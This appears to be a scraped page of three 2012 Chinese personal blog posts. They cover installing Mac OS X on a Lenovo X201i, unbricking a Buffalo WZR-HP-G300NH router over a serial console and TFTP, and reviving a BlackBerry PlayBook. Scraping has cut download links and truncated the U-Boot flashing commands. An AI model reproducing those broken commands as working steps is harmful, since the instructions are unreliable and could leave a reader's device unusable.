2012 | 23:09 这文章是承接一年前的一篇写的,当时还未能装好,但是这个问题在今天莫名的解决了,我在这里简单说一下过程。这里有一个大前提:我手动更换了我的无线网卡为 Atheros 9280 ,原装的是没办法驱动的,换无线网卡很简单,大约5分钟就可以搞定,IBM这种机型很好拆(尽管现在是联想品牌),无线网卡购自淘宝,价格是39元,免驱而且可以使用AirDrop。1 &下载 install cd&/d/WBNQMFNPKSIP2 Write to ur Disk 写到你的移动硬盘OR SD卡或者是U盘上,总之安装方式随便你来选。比如,我是直接使用了 SD Card (scandisk Ultra class 10)。在这一步你可能遇到的麻烦是,往磁盘上写的时候,会提示你无法写,你最好是在windows 下安装 MacDrive ,然后使用MacDrive Format Disk,注意要先 HFS Standard,而不要选HFS+ ,千万要记住。3 不要关机,写完磁盘后,由于你安装了MacDrive,可以直接读到里面的内容,然后你到 /System/Library/Extentions里面,删除 ATI*.kext , NV*.kext ,Gefo*.kext&(非必要项)然后搜索 air ,可以找到 AirPortAtheros40.kext ,删除。这是因为在初始安装时,这个驱动有可能会卡住。。。4 下面就做好安装装备吧,下载 extra &/s/gi64bhy7z8quomc/Extra.zip( 2013 年 2月25日更新)这个Extra 已经包含了 x201i 所需要的DSDT, SMBIO ,以及 变色龙的启动文件,另外也包含了显卡驱动等kext文件。但是显卡驱动放在这个文件夹里是不能用的,不要担心,安装完成后,我们换个位置它们就可以起作用了。把这个解压,并放到 安装磁盘的 根目录 / 下。5 安装变色龙 2.0 (我使用了最新的反而有问题,所以只使用旧版),这个需要你自己去论坛找一下,目的除了让它来引导mac 安装外,还是想让它加载 Extra的内容,保证安装顺利。6 Reboot ,选择变色龙菜单,然后再找到你刚才修改好的安装磁盘,不需要做任何的动作,直接回车,就开始安装了。(非必选项) 有可能在这里你会卡住,屏幕显示:****Bluetooth******:completesystem uptime nano ******* root ****然后就不能继续加载,那么你&删掉S/L/E/AppleGraphicsControl.kext/Contents/PlugIns/ApplePolicyControl.kext7 安装完后,不要进系统而是直接到windows下,再重复一次步骤3的操作8 接着重复一下 步骤4 ,只是这次是放到你已经安装 好的系统盘上。9 启动mac 并登入,这个时候你会在左上角的“关于本机”看到一切正常,只是显卡仍然为64M,这需要担心,10 按照图中&http://d.pr/i/qkBW 的文件,从Extra中剪切到 /S/L/E中。(这个路径就是步骤3中的那个)11 然后此时你应该可以连接 Wi-Fi了,下载 kext wizard ,修复Extra权限和System的权限12 Reboot13 测试一下你的Facetime和itunes,Quick是否可用了。14 可以使用&MultiBeast 看看有没有自己想要的,这个非必选项。15 如果你后期安装了万能声卡驱动 ,但是chrome 没有声音,可以试试& sudo rm &/Library/Preferences/Audio/com.apple.audio.SystemSettings.plist && sudo killall coreaudiod我是这样解决的补充:很多人将自己的mac os x 设定为Macbook Pro 8,1 ,但是果真这样设置,会在显卡驱动加载后让Qucktime, itunes ,Facetime发生意外退出的错误,而且是100%闪退,解决方法就是修改SMBIOS.plist,设定为imac 然后修改 broad product 数值。这个问题最初我遇到,以为是声卡驱动导致,或者是兼容性导致,重装了N次,并且卸载了很多东西,摸索解决的。。。。操Source: [刷机]Buffalo wz-hp-g300nh,不死的砖块Published: October 27,
2012 | 04:00 我手头一个Buffalo wz-hp-g300nh,是 @dahai0622 弄成砖了,让我刷回去,我也折腾好久了,现在写一下具体操作,最先开始的部分需要使用USB 转 TTL ,这是为了让看的人知道原理,后面的部分写只是用网线如何恢复。本文作者 @bao3 是从dd-wrt 刷成了 open-wrt ,然后又从 open-wrt 刷回官方 dd-wrt ,因此使用了大家不常用的方法。1 路由器的TTL 定义,如下图:其中,4是RX,3是TX,2是GND,1号位置是提供3.3v电压,请不要使用,千万空出来!使用TTL线将其接到USB转TTL的卡上。没有的话就买一个,我当时淘宝买的,6块钱不包邮,送TTL线。成本不高,但是如果你是一个GEEK,你会发现,现实生活中有很多地方要用到USB转TTL,比如电视机顶盒,卫星大锅,路由器,arduino,raspberry pi。好了,不多说了。&2 使用终端连接你可以使用超级终端,也可以使用 putty的series 那个选项,或者跟我一样,选择 Xshell 的这个功能,Xshell 抓图如下3 打开xshell 中我们刚刚设定的这个连接,然后给路由器通电,然后在xshell 中一直按 ctrl+C ,一直到看到你进入了 bufflao 的U-boot界面,类似于:ar71xx&ar72xx&4 下载原厂Firmware这一步你一定要这么做,因为网上那些教你改文件头等等方法太麻烦了,而且成功几率就跟勇气号遇到火星人那么高。下载连接 &建议你找个地方保存,比如 &。解压缩文件,可以得到一个 trx 结尾和一个 bin结尾的。 如果你用的是 openwrt ,又想从 web 页面升级,就是用 trx 那个,如果你原本就是 dd wrt 就直接使用 bin那个,也就是说,这个方法可以让你直接从 openwrt 转换成 dd wrt 官方版,不过这是题外话,我们先说用 TTL 的方法将 bin结尾的那个文件改名为 &firmware.bin ,备用。(二选一)5 &选项1 下载 tftp 软件&&将我们的电脑使用网线与路由器相连,电脑接在路由器第二个口(其实第三口,第四口都可以,唯独第一口不可以),并且设定我们电脑网卡的IP &192.168.11.2 , 掩码 255.255.255.0 网关:192.168.11.1 (原则上不用设置,但是不设置我的win7连接不上。。。靠,你可以不用设置哟),同时关闭windows防火墙。下载 tftp 服务器,我使用的是 cisco tftp server (很不幸,我下载了个汉化版,担心有病毒。。。那个提心吊胆,如果你不是在深夜弄着玩意,还是去官方下载安全哦)将 firmware.bin 放在 tftp 相同目录下。然后回到 我们的 xshell ,直接输入 :tftp $tmp_ram firmware.然后就看到 tftp 开始传送文件咯~~~~选项2 直接使用 xshell 传送文件这个适合时间多或者没有网线,必须使用串口,通过TTL发送文件的朋友,小弟这样刷过几次传递很慢,但是很稳定,截图如下&当然这个方法,也需要你在控制台终端中敲一个命令,&ar71xx & help&自己找吧,对照我发的图片,你很容易会知道啥命令,只是要将文件写入 $tmp_ram 就可以,你不必关心 $tmp_ram 到底是哪一段内存,系统自己清楚。6 回到Xshell,开始刷机在第5步中虽然有2个选项,不同方法,不过最后都达到一个效果,那就是将 firmware.bin 传送到了 $tmp_ram 里,所以接下来,你直接在 &ar71xx& 后面输入:&&erase $fw_ cp.b $fileaddr BE060000 $ bootm BE060000;补充:7 正常刷机大多数朋友不会喜欢这种拆解路由器的行为,因为会希望使用 网线连接 g300nh 进行刷机,那么请注意我在上面提到的:1) 下载&2)将解压后 *.bin 的文件重命名成 firmware.bin&3)下载 tftp 软件,并将 firmware.bin 与 tftp 同一个目录4) 修改自己的IP,关闭win防火墙,将电脑接在路由器的第二口5) 关闭 wzr-hp-g300nh 电源,并重新启动6)系统会自动套用 我上面给出来的那一串命令7) 如果你没有下载我给出的这个包,但是使用了这个方法却不能刷,我告诉你,是因你的的那个文件自动下载后被检测到不符合官方要求,所以请务必使用我给出的这个包8)为啥我确定这样做是可以的?如果你使用了我上面的 usb 转 TTL 方法,在 ar71xx& 后面输入 “ printenv ” 你就可以找到 我上面给出的命令,这就是官方默认的,很多人使用网线刷机不成功就是这个原因。好了,我就写到这里,因为通过这个方法,你已经刷成了官方的 dd-wrt 版本,注意哟,这个版本你可以从Xshell 进入的,如果你升级到了官方最新版,就会发现官方屏蔽了 xshell 的串口调试【竖中指】使用 buffalo 官方的好处,就是稳定!而且更好的是,reset 可以使用,几乎想好的功能官方都已经有了,没有什么理由去使用 dd-wrt 非官方版了。我建议还在使用 openwrt 并且有问题的,还是刷会官方 dd-wrt吧。Source: playbook 复活Published: October 15,
2012 | 15:14 RIM 的PlayBook是7吋,用来开会记事很方便(如果你不介意没有中文的话),但是有个很操蛋的问题:随时变砖。经常折腾数码的人会知道变砖的具体含义,本来我的Playbook 无法启动我也是要放弃,不过就在今天早上,它又复活了。我的Playbook插上电脑后,先亮15秒左右的红灯,然后红灯熄灭1秒钟后闪动5下绿灯(也可能是黄灯,因为是黄绿色),然后机器没有任何反应,电脑上可以识别刷机,不过仍然是没用的。后来采取了网上说的拔插法,将USB线插上电脑,红灯灭的一瞬间将线拔出,重复多次,我尝试了不下50次,中间也更换使用iPad2充电器。但这些都是徒劳的,我的意思是,我的playbook没有任何改变。从上周五到今天(周一),我一直给它充电,今天早上我将USB数据线更换成enloop充电宝的充电线,结果在红灯灭后屏幕亮了!Playbook变砖的症结在于,系统充电需要先经由电池控制芯片调度,但是当你安装了android程序这类后台耗电的app后,将playbook的电量消耗干净了,干净到连电池控制芯片都没电,于是就变砖了,当你插上USB线充电时,实际上是先给电池控制芯片充电,也即是拔插法。另外一个是要长时间给电池充电,我不确定这有没有用,但是很多人都是长时间充电后发生奇迹。Source: …Report "莓玩没了(TM)"Are you sure you want to report this post for ?Cancel×

我要回帖

更多关于 mdk3攻击命令 的文章

 

随机推荐